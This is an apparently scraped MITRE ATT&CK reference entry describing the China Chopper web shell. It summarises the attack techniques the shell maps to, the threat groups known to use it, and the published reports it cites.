Tool description: China Chopper

attack.mitre.org · MITRE ATT&CK · 8 years ago · tool
quality 7/10 · good
0 net
Tags
chopper mitre
China Chopper, Software S0020 | MITRE ATT&CK® ATT&CK v19 will be released April 28th! Check out this blog post for information on the planned deprecation of Enterprise's Defense Evasion tactic in the upcoming release. Home Software China Chopper China Chopper China Chopper is a Web Shell hosted on Web servers to provide access back into an enterprise network that does not rely on an infected system calling back to a remote command and control server. [1] It has been used by several threat groups. [2] [3] [4] [5] ID:  S0020 ⓘ Type : MALWARE ⓘ Platforms : Windows Version : 2.5 Created:  31 May 2017 Last Modified:  03 January 2024 Version Permalink Live Version ATT&CK ® Navigator Layers Enterprise Layer download view Techniques Used Domain ID Name Use Enterprise T1071 .001 Application Layer Protocol : Web Protocols China Chopper 's server component executes code sent via HTTP POST commands. [3] Enterprise T1110 .001 Brute Force : Password Guessing China Chopper 's server component can perform brute force password guessing against authentication portals. [3] Enterprise T1059 .003 Command and Scripting Interpreter : Windows Command Shell China Chopper 's server component is capable of opening a command terminal. [6] [1] [7] Enterprise T1005 Data from Local System China Chopper 's server component can upload local files. [3] [1] [7] [5] Enterprise T1083 File and Directory Discovery China Chopper 's server component can list directory contents. [3] [5] Enterprise T1070 .006 Indicator Removal : Timestomp China Chopper 's server component can change the timestamp of files. [3] [1] [7] Enterprise T1105 Ingress Tool Transfer China Chopper 's server component can download remote files. [3] [1] [7] [5] [8] Enterprise T1046 Network Service Discovery China Chopper 's server component can spider authentication portals. [3] Enterprise T1027 .002 Obfuscated Files or Information : Software Packing China Chopper 's client component is packed with UPX. [1] Enterprise T1505 .003 Server Software Component : Web Shell China Chopper 's server component is a Web Shell payload. [1] Groups That Use This Software ID Name References G0093 GALLIUM [9] [10] G0135 BackdoorDiplomacy [11] G0117 Fox Kitten [12] G0027 Threat Group-3390 [2] [6] [13] [14] G0096 APT41 APT41 used the China Chopper web shell as a persistence mechanism on compromised Microsoft Exchange servers. [15] [16] G1022 ToddyCat [8] G0125 HAFNIUM [17] [18] [5] G0065 Leviathan [3] [4] [19] G0129 Mustang Panda Mustang Panda has used China Chopper web shells to maintain access to victims’ environments. [20] References Lee, T., Hanzlik, D., Ahl, I. (2013, August 7). Breaking Down the China Chopper Web Shell - Part I. Retrieved March 27, 2015. Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, August 5). Threat Group-3390 Targets Organizations for Cyberespionage. Retrieved August 18, 2018. FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018. CISA. (2021, July 19). (AA21-200A) Joint Cybersecurity Advisory – Tactics, Techniques, and Procedures of Indicted APT40 Actors Associated with China’s MSS Hainan State Security Department. Retrieved August 12, 2021. Eoin Miller. (2021, March 23). Defending Against the Zero Day: Analyzing Attacker Behavior Post-Exploitation of Microsoft Exchange. Retrieved October 27, 2022. Counter Threat Unit Research Team. (2017, June 27). BRONZE UNION Cyberespionage Persists Despite Disclosures. Retrieved July 13, 2017. The Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NZ NCSC), CERT New Zealand, the UK National Cyber Security Centre (UK NCSC) and the US National Cybersecurity and Communications Integration Center (NCCIC). (2018, October 11). Joint report on publicly available hacking tools. Retrieved March 11, 2019. Dedola, G. (2022, June 21). APT ToddyCat. Retrieved January 3, 2024. Cybereason Nocturnus. (2019, June 25). Operation Soft Cell: A Worldwide Campaign Against Telecommunications Providers. Retrieved July 18, 2019. MSTIC. (2019, December 12). GALLIUM: Targeting global telecom. Retrieved January 13, 2021. Adam Burgher. (2021, June 10). BackdoorDiplomacy: Upgrading from Quarian to Turian. Retrieved September 1, 2021 CISA. (2020, September 15). Iran-Based Threat Actor Exploits VPN Vulnerabilities. Retrieved December 21, 2020. Pantazopoulos, N., Henry T. (2018, May 18). Emissary Panda – A potential new malicious tool. Retrieved June 25, 2018. Falcone, R. and Lancaster, T. (2019, May 28). Emissary Panda Attacks Middle East Government Sharepoint Servers. Retrieved July 9, 2019. DCSO CyTec Blog. (2022, December 24). APT41 — The spy who failed to encrypt me. Retrieved June 13, 2024. Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019. Gruzweig, J. et al. (2021, March 2). Operation Exchange Marauder: Active Exploitation of Multiple Zero-Day Microsoft Exchange Vulnerabilities. Retrieved March 3, 2021. Bromiley, M. et al. (2021, March 4). Detection and Response to Exploitation of Microsoft Exchange Zero-Day Vulnerabilities. Retrieved March 9, 2021. Accenture iDefense Unit. (2019, March 5). Mudcarp's Focus on Submarine Technologies. Retrieved August 24, 2021. Lior Rochberger, Tom Fakterman, Robert Falcone. (2023, September 22). Cyberespionage Attacks Against Southeast Asian Government Linked to Stately Taurus, Aka Mustang Panda. Retrieved September 9, 2025. × load more results
← Back to stories